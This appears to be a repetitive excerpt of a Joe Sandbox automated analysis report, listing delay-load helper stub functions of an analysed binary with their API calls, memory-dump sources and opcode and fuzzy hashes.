                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 19acba053df985c3f09e472bc950aff58a7e4f474b00c9e77513d6846ce9e0eb
                                                                                              • Instruction ID: cf9b264bccc38f14f1059e68cea4b3ca4a83b6bd4e9f94a749a504af545e5036
                                                                                              • Opcode Fuzzy Hash: 19acba053df985c3f09e472bc950aff58a7e4f474b00c9e77513d6846ce9e0eb
                                                                                              • Instruction Fuzzy Hash: 3AB012C235E1137C3204B1183E03D77014DC0C6B10731B51EF84CF54C1E4445C400271
                                                                                              Function 00E8498F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: dcd12c6559032e73305a72bb6ada1fdf8ceb8bc4afa9b7af80f6ed782a389171
                                                                                              • Instruction ID: 5e5ab82c3752c3a780525874ce6833384d2217bc4235c926c86da5dbd48353c4
                                                                                              • Opcode Fuzzy Hash: dcd12c6559032e73305a72bb6ada1fdf8ceb8bc4afa9b7af80f6ed782a389171
                                                                                              • Instruction Fuzzy Hash: 21B012D235D1136C3204B1183D03D77014CC4C6B10330B51EF44CF54D1E4445D800631
                                                                                              Function 00E84985 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 963a6646c3b7a98e62f7c740178c622acb3cb30ba233d9532aaccb501b2c7e91
                                                                                              • Instruction ID: 8f98541e9d82dbbc661e58939cb0d2d8ad04ba8de31a46467c6500ba355c2c9e
                                                                                              • Opcode Fuzzy Hash: 963a6646c3b7a98e62f7c740178c622acb3cb30ba233d9532aaccb501b2c7e91
                                                                                              • Instruction Fuzzy Hash: E9B012C236D1136C3308B1683D03D77014CD0C5B10330B91EF04CF55C1E4445C440231
                                                                                              Function 00E84999 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: f7955d9501ef70e73e9d81efc0609a3cd3ec92ca68c1b869e2eb51e063fb5dfe
                                                                                              • Instruction ID: 75a4684c4f16d1ac65244c55c550a61a13aca5a638163baad7f2404bf3f61185
                                                                                              • Opcode Fuzzy Hash: f7955d9501ef70e73e9d81efc0609a3cd3ec92ca68c1b869e2eb51e063fb5dfe
                                                                                              • Instruction Fuzzy Hash: 8FB012D235D2136C3344B1183D03D77014CC0C5B10330761EF04CF54D1E4445DC00631
                                                                                              Function 00E84967 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: aad85a4b14ad25e247a549939dafdc2b7baa46b8df1fc54a4fb09dfacfc94668
                                                                                              • Instruction ID: 17616cd1156ccc8d058c7a920cc9b1e35cade92d697285752943c1858ceb389f
                                                                                              • Opcode Fuzzy Hash: aad85a4b14ad25e247a549939dafdc2b7baa46b8df1fc54a4fb09dfacfc94668
                                                                                              • Instruction Fuzzy Hash: 1CB092C226D1136C2208A5183D02D770148C0C6B10320B51AF44CE55C1A44458440231
                                                                                              Function 00E8497B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 1cbf27201f1056ad672ef6a000d1e945a358807b70cf705733300e216208fbdf
                                                                                              • Instruction ID: ee96e55a389b538da5ccdbb58e9771b943039ea127eacf84ad1b219a78010c0b
                                                                                              • Opcode Fuzzy Hash: 1cbf27201f1056ad672ef6a000d1e945a358807b70cf705733300e216208fbdf
                                                                                              • Instruction Fuzzy Hash: 5EB012C236D1136C3308B1183E03D77014CC0C5B10330B55EF44CF55C1E4455D490231
                                                                                              Function 00E84949 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 19d316db3c5db7de9d8c1cc4b6e0ce7e6caa64827354c1d17bece35361ae51ec
                                                                                              • Instruction ID: 2851919bc97541648ada0467ebe68d950a57b40ef66733a438fcddbe0c8ecb04
                                                                                              • Opcode Fuzzy Hash: 19d316db3c5db7de9d8c1cc4b6e0ce7e6caa64827354c1d17bece35361ae51ec
                                                                                              • Instruction Fuzzy Hash: C1B012C635D3136C3344B1583D03D77014CC0C5B10330761EF04CF55C2E4449C800231
                                                                                              Function 00E8495D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 08720f7854d9738113d3dd3ac7c6cc1b76ffe1d55bf9b3cce6dda480fd3499b9
                                                                                              • Instruction ID: 690cb06ad7e0c57008a73df03911a1afa990a90def898b81aa4c30430efade3f
                                                                                              • Opcode Fuzzy Hash: 08720f7854d9738113d3dd3ac7c6cc1b76ffe1d55bf9b3cce6dda480fd3499b9
                                                                                              • Instruction Fuzzy Hash: 15B012C635D2136C3204B1583D03D77014CD0C5B10330751EF04CF55C2E4449C400331
                                                                                              Function 00E84953 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: d362b9b95f6e87496a8a5f36931ba0b631ea7c9982decd87ebf4f3801df32e2e
                                                                                              • Instruction ID: 87ac2ef808c97f6b0aafce61d8da03dcccb9a56c63cca95b1a2e2efdbdae8362
                                                                                              • Opcode Fuzzy Hash: d362b9b95f6e87496a8a5f36931ba0b631ea7c9982decd87ebf4f3801df32e2e
                                                                                              • Instruction Fuzzy Hash: 21B012C635D3136C3204B1583E03D77014CC0C5B10330755EF44CF55C2E4459E410231
                                                                                              Function 00E8492B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: d181a77016e5b873943299132870f90f9f406e0ec896c9d07490760ec159edcd
                                                                                              • Instruction ID: 295460cdd138ecdcfe57281489b70a66faa597bbaa2e4b10d54e2c351d5d1a44
                                                                                              • Opcode Fuzzy Hash: d181a77016e5b873943299132870f90f9f406e0ec896c9d07490760ec159edcd
                                                                                              • Instruction Fuzzy Hash: C5B012C235D1136C3204B1187E03D77015CC0C5B10330775EF54CF54C1E4455D410231
                                                                                              Function 00E84921 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: ccf6712a6305a60555a9ef571b16be4c521c3e05cfc8dfbd68eee787f4613917
                                                                                              • Instruction ID: 671a45131ff664c0d875b74a006b3e3c55d2b52b5ceb6a292dd9c8824a483645
                                                                                              • Opcode Fuzzy Hash: ccf6712a6305a60555a9ef571b16be4c521c3e05cfc8dfbd68eee787f4613917
                                                                                              • Instruction Fuzzy Hash: E5B012C235D2136C3344B1187D03D77015CC0C5B10330771EF14CF54C1E4445C800231
                                                                                              Function 00E8493F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: a81fad7422da029134a09b3d90d4bd19ee640d000011aa4af65822f236844491
                                                                                              • Instruction ID: 0e9917c572d28201adc883ce2fac5b70543a4818ddb7c92f122c7c93660b935b
                                                                                              • Opcode Fuzzy Hash: a81fad7422da029134a09b3d90d4bd19ee640d000011aa4af65822f236844491
                                                                                              • Instruction Fuzzy Hash: 05B012C635D2136C3204B1583D03D77014CC0C6B10330B51EF44CF55C2E444AC400231
                                                                                              Function 00E84935 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 9da9d7065c1f718e3d990dbc4e9acd52219c7b3064a4ef19e7b91ffc72d51c4b
                                                                                              • Instruction ID: 6e3d2742f4f71d326235fec959e175865510bdc2b6bb5cfb228b65bf99cd2eba
                                                                                              • Opcode Fuzzy Hash: 9da9d7065c1f718e3d990dbc4e9acd52219c7b3064a4ef19e7b91ffc72d51c4b
                                                                                              • Instruction Fuzzy Hash: 4FB012C236D2136C3204B1187D03D77015CD0C5B10330761FF14CF54C1E4445C400231
                                                                                              Function 00E84906 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 4936df4361e5cf9ce47363adb3ca4ab63efe8cbe97e0a28e6e495f95b5976f42
                                                                                              • Instruction ID: 42ba7f706bcecd1d494cc84118292329a66d5e7684d1e46c81c38a505faa44e5
                                                                                              • Opcode Fuzzy Hash: 4936df4361e5cf9ce47363adb3ca4ab63efe8cbe97e0a28e6e495f95b5976f42
                                                                                              • Instruction Fuzzy Hash: A5B012D235D1137C320471143E03D77010CC0C1B10330759EF44CF44D2A8466D410131
                                                                                              Function 00E84A07 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 0ca9b427f4981d22aabb2c04ede4b7ecc2704e0880337e72cc875fe3f8b50bbb
                                                                                              • Instruction ID: 3e9904b6c3adad6e5bc28787c3b690e1f4eba6584fc691ee1256d2003028f9e1
                                                                                              • Opcode Fuzzy Hash: 0ca9b427f4981d22aabb2c04ede4b7ecc2704e0880337e72cc875fe3f8b50bbb
                                                                                              • Instruction Fuzzy Hash: 09B012C235D1136C3214B1193D03D77014CC0C6B10330B92EF44CF98C1E4445C400231
                                                                                              Function 00E849EE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
